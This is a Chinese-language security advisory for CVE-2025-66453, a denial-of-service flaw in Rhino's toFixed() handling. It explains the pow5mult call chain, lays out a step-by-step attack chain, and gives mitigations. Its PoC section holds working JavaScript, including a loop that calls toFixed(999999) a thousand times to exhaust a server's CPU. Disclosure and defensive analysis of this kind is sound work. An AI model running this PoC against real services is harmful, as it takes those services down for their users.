CVE-2025-66453: Rhino JavaScript引擎toFixed()函数拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-66453

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rhino JavaScript Engine

漏洞概述

Rhino是Mozilla开发的一个纯Java实现的JavaScript开源引擎，广泛应用于需要嵌入式JavaScript功能的Java应用程序中。该漏洞存在于Rhino的toFixed()函数实现中，攻击者可以通过向该函数传递精心构造的浮点数来触发拒绝服务（DoS）攻击。当应用程序处理用户输入的浮点数并调用toFixed()方法时，如果输入的小数位数设置过大，会导致DToA模块中的pow5mult函数执行极高次数的幂运算（5的n次方），造成CPU资源耗尽，最终导致应用程序无响应或崩溃。此漏洞无需任何特殊权限或用户交互即可被利用，属于远程网络攻击向量。由于JavaScript引擎常被用于服务器端脚本执行、Web应用后端服务等场景，攻击者可以通过发送特制请求轻松触发该漏洞，影响服务的可用性。

技术细节

该漏洞的核心问题在于Rhino的DToA模块中数字到字符串转换的实现。当调用toFixed()函数且参数值较大时，执行流程如下：首先，NativeNumber.numTo方法被调用；然后传递到DToA.JS_dtostr函数；接着进入DToA.JS_dtoa函数；最终调用DToA.pow5mult函数。pow5mult函数的目的是计算5的n次幂（其中n为toFixed()的参数值），当n值极大时（如1000或更高），计算5^n会导致计算复杂度指数级增长，消耗大量CPU时间和内存资源。在纯Java实现中，这种大数幂运算没有像C语言实现那样的优化措施，更容易触发性能问题。攻击者可以通过JavaScript代码（如：value.toFixed(1000000)）轻松触发此漏洞路径。由于JavaScript引擎通常在服务器端运行，攻击者可以通过发送包含恶意浮点数的HTTP请求来批量触发此漏洞，导致服务瘫痪。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标应用是否使用Rhino JavaScript引擎，通过分析应用功能或公开的依赖信息确认攻击面

STEP 2

步骤2: 构造攻击载荷

攻击者构造包含极大精度参数的JavaScript代码，如调用toFixed(1000000)或更大的值，触发pow5mult函数的指数级计算

STEP 3

步骤3: 发送恶意请求

攻击者通过HTTP请求、WebSocket或其他协议向服务器发送包含恶意JavaScript代码的请求，这些代码会被Rhino引擎执行

STEP 4

步骤4: 触发漏洞

Rhino引擎执行toFixed()函数，进入调用链：NativeNumber.numTo -> DToA.JS_dtostr -> DToA.JS_dtoa -> DToA.pow5mult，开始计算5的高次幂

STEP 5

步骤5: 资源耗尽

pow5mult函数执行5的n次方运算（n极大），导致CPU占用率急剧上升，同时可能消耗大量内存资源

STEP 6

步骤6: 服务拒绝

由于CPU资源被耗尽，服务器无法处理正常请求，导致应用程序无响应或崩溃，实现拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66453 PoC - Rhino toFixed() DoS Vulnerability
// Affects: Rhino < 1.7.14.1, < 1.7.15.1, < 1.8.1

// Example 1: Basic PoC
function triggerDoS() {
    var maliciousNumber = 0.123456;
    // Pass extremely large value to toFixed() to trigger pow5mult with huge exponent
    var result = maliciousNumber.toFixed(1000000);
    return result;
}

// Example 2: Simulate attacker-controlled input scenario
function simulateAttack(userInput) {
    var floatValue = parseFloat(userInput);
    if (!isNaN(floatValue)) {
        // Attacker can control the precision parameter
        var precision = parseInt(userInput.split('.')[1]) || 0;
        // Trigger vulnerability with large precision value
        return floatValue.toFixed(precision * 10000);
    }
}

// Example 3: Batch trigger for service disruption
function massAttack() {
    for (var i = 0; i < 1000; i++) {
        try {
            (0.1).toFixed(999999);
        } catch (e) {
            // Handle potential errors but continue attack
        }
    }
}

// Execute PoC
try {
    triggerDoS();
    console.log('DoS triggered successfully');
} catch (e) {
    console.log('Error: ' + e.message);
}

影响范围

Rhino < 1.7.14.1

Rhino < 1.7.15.1

Rhino < 1.8.1

防御指南

临时缓解措施

如果无法立即升级，可通过以下措施临时缓解：在JavaScript执行层对所有浮点数的toFixed()调用进行参数校验，限制精度参数不超过100；实现请求频率限制，防止攻击者批量发送恶意请求；对用户输入进行严格的白名单验证，过滤非数字或格式异常的输入；在服务器端部署负载均衡和自动扩缩容机制，以应对突发的资源消耗；同时建议配置CPU和内存监控告警，及时发现异常情况。